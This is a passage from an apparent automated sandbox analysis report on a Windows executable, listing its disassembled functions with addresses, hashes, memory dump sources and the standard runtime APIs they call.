                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1de5265e70b36155833214aa989500a80106cc326832a612e1592c9f84b4bff4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51118132708E4246EB309F35A54576AB3B0BB89BE8F941230DAAD47784CE3DD445CB50
                                                                                                                                                                                                                          Function 00007FF79CD65CDC Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                          • Opcode ID: 9970b8f7cffa43d163a31991d0b0a315de01f85d4899b19f19aa1241bd85657f
                                                                                                                                                                                                                          • Instruction ID: 365f215f3303cd52b2f011be8a44219ed2d0e3d7440f8e3bbd2389a3c41a48e2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9970b8f7cffa43d163a31991d0b0a315de01f85d4899b19f19aa1241bd85657f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33D06724B19E4746EF787B709A5D278B2715F48741B903839C84A06393EE2DA489C620
                                                                                                                                                                                                                          Function 00007FF79CD67AC0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Info
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1807457897-3916222277
                                                                                                                                                                                                                          • Opcode ID: def6ae39759c99b8442a1cb0086763bc1c342e8da2fadd83734d301a84aff10f
                                                                                                                                                                                                                          • Instruction ID: baea0fc8261db3318db2de0e588d995453d4af1533642e9288fcce66c7bcbd8e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: def6ae39759c99b8442a1cb0086763bc1c342e8da2fadd83734d301a84aff10f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF518E32B1CAC68AEB219F38D1943AEBBB0F748748F965136D68D47A85CB3CD145CB10
                                                                                                                                                                                                                          Function 00007FF79CD6804C Relevance: 3.2, APIs: 2, Instructions: 194COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 181 7ff79cd6804c-7ff79cd6807f call 7ff79cd679a8 184 7ff79cd682d9-7ff79cd682dc call 7ff79cd67a28 181->184 185 7ff79cd68085-7ff79cd68092 181->185 188 7ff79cd682e1 184->188 187 7ff79cd68095-7ff79cd68097 185->187 189 7ff79cd6809d-7ff79cd680a8 187->189 190 7ff79cd681e3-7ff79cd68211 call 7ff79cd6d840 187->190 191 7ff79cd682e3-7ff79cd68308 call 7ff79cd61b90 188->191 189->187 192 7ff79cd680aa-7ff79cd680b0 189->192 200 7ff79cd68214-7ff79cd6821a 190->200 195 7ff79cd681db-7ff79cd681de 192->195 196 7ff79cd680b6-7ff79cd680c1 IsValidCodePage 192->196 195->191 196->195 199 7ff79cd680c7-7ff79cd680ce 196->199 201 7ff79cd680f6-7ff79cd68105 GetCPInfo 199->201 202 7ff79cd680d0-7ff79cd680de 199->202 203 7ff79cd6821c-7ff79cd6821f 200->203 204 7ff79cd6825a-7ff79cd68264 200->204 207 7ff79cd6810b-7ff79cd6812b call 7ff79cd6d840 201->207 208 7ff79cd681cf-7ff79cd681d5 201->208 205 7ff79cd680e2-7ff79cd680f1 202->205 203->204 206 7ff79cd68221-7ff79cd6822c 203->206 204->200 209 7ff79cd68266-7ff79cd68272 204->209 210 7ff79cd682cf-7ff79cd682d2 call 7ff79cd67ac0 205->210 211 7ff79cd6822e 206->211 212 7ff79cd68252-7ff79cd68258 206->212 224 7ff79cd681c5 207->224 225 7ff79cd68131-7ff79cd6813a 207->225 208->184 208->195 214 7ff79cd6829d 209->214 215 7ff79cd68274-7ff79cd68277 209->215 222 7ff79cd682d7 210->222 217 7ff79cd68232-7ff79cd68239 211->217 212->203 212->204 221 7ff79cd682a4-7ff79cd682b7 214->221 219 7ff79cd68279-7ff79cd6827c 215->219 220 7ff79cd68294-7ff79cd6829b 215->220 217->212 223 7ff79cd6823b-7ff79cd68250 217->223 226 7ff79cd6827e-7ff79cd68280 219->226 227 7ff79cd6828b-7ff79cd68292 219->227 220->221 228 7ff79cd682bc-7ff79cd682cd 221->228 222->188 223->212 223->217 231 7ff79cd681c7-7ff79cd681ca 224->231 229 7ff79cd6813c-7ff79cd6813f 225->229 230 7ff79cd68168-7ff79cd6816c 225->230 226->221 232 7ff79cd68282-7ff79cd68289 226->232 227->221 228->210 228->228 229->230 233 7ff79cd68141-7ff79cd6814a 229->233 234 7ff79cd68171-7ff79cd6817a 230->234 231->205 232->221 235 7ff79cd6814c-7ff79cd68151 233->235 236 7ff79cd68160-7ff79cd68166 233->236 234->234 237 7ff79cd6817c-7ff79cd68185 234->237 238 7ff79cd68154-7ff79cd6815e 235->238 236->229 236->230 239 7ff79cd68187-7ff79cd6818a 237->239 240 7ff79cd681b5 237->240 238->236 238->238 242 7ff79cd681ac-7ff79cd681b3 239->242 243 7ff79cd6818c-7ff79cd6818f 239->243 241 7ff79cd681bc-7ff79cd681c3 240->241 241->231 242->241 244 7ff79cd681a3-7ff79cd681aa 243->244 245 7ff79cd68191-7ff79cd68193 243->245 244->241 246 7ff79cd6819a-7ff79cd681a1 245->246 247 7ff79cd68195-7ff79cd68198 245->247 246->241 247->241
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF79CD679A8: GetOEMCP.KERNEL32 ref: 00007FF79CD679D2
                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(?,?,?,?,?,00000000,?,00007FF79CD67E15), ref: 00007FF79CD680B9
                                                                                                                                                                                                                          • GetCPInfo.KERNEL32(?,?,?,?,?,00000000,?,00007FF79CD67E15), ref: 00007FF79CD680FD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CodeInfoPageValid
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 546120528-0
                                                                                                                                                                                                                          • Opcode ID: ae5910aece98d32cc3646f991b01a86ca2527d8335ae83298894c3b7adc5338a
                                                                                                                                                                                                                          • Instruction ID: 644215394ea830f58606ec810128b5d682c9b18140ad0e79a60d0ab9d3602111
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae5910aece98d32cc3646f991b01a86ca2527d8335ae83298894c3b7adc5338a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D81B062B08E8387EF74AB359A4417AF6B1EB48744FD86036C68E47691DE3CE645C320
                                                                                                                                                                                                                          Function 00007FF79CD65C0D Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3947729631-0
                                                                                                                                                                                                                          • Opcode ID: 24843ef6124b96e5061802c873c7f8ff446cc0eb4c12843afe46242c94801afe
                                                                                                                                                                                                                          • Instruction ID: 903835f3d848b9038b63b898d16beb9ed04887ec2cd97cdf27ed923f70062c41
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24843ef6124b96e5061802c873c7f8ff446cc0eb4c12843afe46242c94801afe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1216B32F04E068AEF24AF74C4482AC77B0EB4471CF95263AD65C46AC5EF78D485CBA0
                                                                                                                                                                                                                          Function 00007FF79CD68754 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: f65aabccbbc4481f6d2d60315144911fd1256f150aa1b1a7f28cdda443558235
                                                                                                                                                                                                                          • Instruction ID: 76f54b084da14e2f82d097fd144e96470edb720cc7f22961fee8836e237b6ee6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f65aabccbbc4481f6d2d60315144911fd1256f150aa1b1a7f28cdda443558235
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40113D32A18E4787FB20BB24E944569F3B5FB80788F992435E65D47692DF3CE910CB20
                                                                                                                                                                                                                          Function 00007FF79CD61C5C Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF79CD61C70
                                                                                                                                                                                                                            • Part of subcall function 00007FF79CD63194: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF79CD6319C
                                                                                                                                                                                                                            • Part of subcall function 00007FF79CD63194: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF79CD631A1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1208906642-0
                                                                                                                                                                                                                          • Opcode ID: bacd44578f9d11e0feaffbaaa14868b563015721ea4207bc6ef9450bb77db74f
                                                                                                                                                                                                                          • Instruction ID: 88948e69fe2a3ff85370a0224576c28cf1eceba035cfd990cb0e7be81b304c7c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bacd44578f9d11e0feaffbaaa14868b563015721ea4207bc6ef9450bb77db74f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CCE0B650F0DD0390FD78367513822BDF6700F26308FC13079D85E221C79E5E61569171
                                                                                                                                                                                                                          Function 00007FF79CD670F4 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,00000000,00007FF79CD66D5E,?,?,?,00007FF79CD670DD,?,?,?,?,00007FF79CD671A0), ref: 00007FF79CD67149
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                                                                          • Opcode ID: 37772468927d3350c72d945f7f2cadb0cbb3eb1aa510c88c82fbf26afa4e02ae
                                                                                                                                                                                                                          • Instruction ID: 310b241b72eb485ebe69e89efc262bd842f29d03a3059c4e30ac111d738b7670
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37772468927d3350c72d945f7f2cadb0cbb3eb1aa510c88c82fbf26afa4e02ae
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2F03794B09E0B41FE7876729A652B5A2B51F48B80F893432CD0E86382FE1CA481C270

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          Function 00007FF79CD61F88 Relevance: 10.6, APIs: 7, Instructions: 71COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3140674995-0
                                                                                                                                                                                                                          • Opcode ID: 98f61b962b635611d8ce928467ecb0ca7bec666144f18dc59094fce9aef6e69c
                                                                                                                                                                                                                          • Instruction ID: 69bc7951f61f4597eaf2bf0efa6022b59c2b589a23f32fae2f11077ed4a22e4d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98f61b962b635611d8ce928467ecb0ca7bec666144f18dc59094fce9aef6e69c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D31FA76709E8286EB709F70E8443A9B3B4FB85744F84503ADA8D47B99DF78D548C720
                                                                                                                                                                                                                          Function 00007FF79CD64ED0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1239891234-0
                                                                                                                                                                                                                          • Opcode ID: d1c0753b45e426435a8a4ce7cdf9e8e24984b0068f93f26bb6ef6e37265ddb95
                                                                                                                                                                                                                          • Instruction ID: 9a708144194a0d8a3eff3c6d2fa971c72e7acd26a16faaa8eaea9a74f149dba1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1c0753b45e426435a8a4ce7cdf9e8e24984b0068f93f26bb6ef6e37265ddb95
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64314C32718F8286EB609B35E9443AEB3B4FB89754F901135EA9D43B58DF38C145CB10
                                                                                                                                                                                                                          Function 00007FF79CD671BC Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2227656907-0
                                                                                                                                                                                                                          • Opcode ID: 10bf1c17885ae481df4921f10efdec88151a66c48eced4c51bce40f6b2bca377
                                                                                                                                                                                                                          • Instruction ID: a42cfb1514f5fed38fa78fb08a3720e5c6e610d475b2aa284411b72fad5a954a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10bf1c17885ae481df4921f10efdec88151a66c48eced4c51bce40f6b2bca377
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54B1A621B18E9B41EE70AB319A241B9B771EB44BE4F856136EE5D07B85DF3CE441C710
                                                                                                                                                                                                                          Function 00007FF79CD61E60 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                          • Opcode ID: f692048cd7e882056fb308abdae2d545c6f02f54afc5eaf85d7fbe30cc9b5711
                                                                                                                                                                                                                          • Instruction ID: 847b13098e767a0de400a73479fe33a1e2d6c27ea6a929387e1b5bfa6ef8661d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f692048cd7e882056fb308abdae2d545c6f02f54afc5eaf85d7fbe30cc9b5711
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21110622B19F028AEF109B70E8553A873B4FB59758F842A31DA6D867A4DF7CD158C250
                                                                                                                                                                                                                          Function 00007FF79CD699E4 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
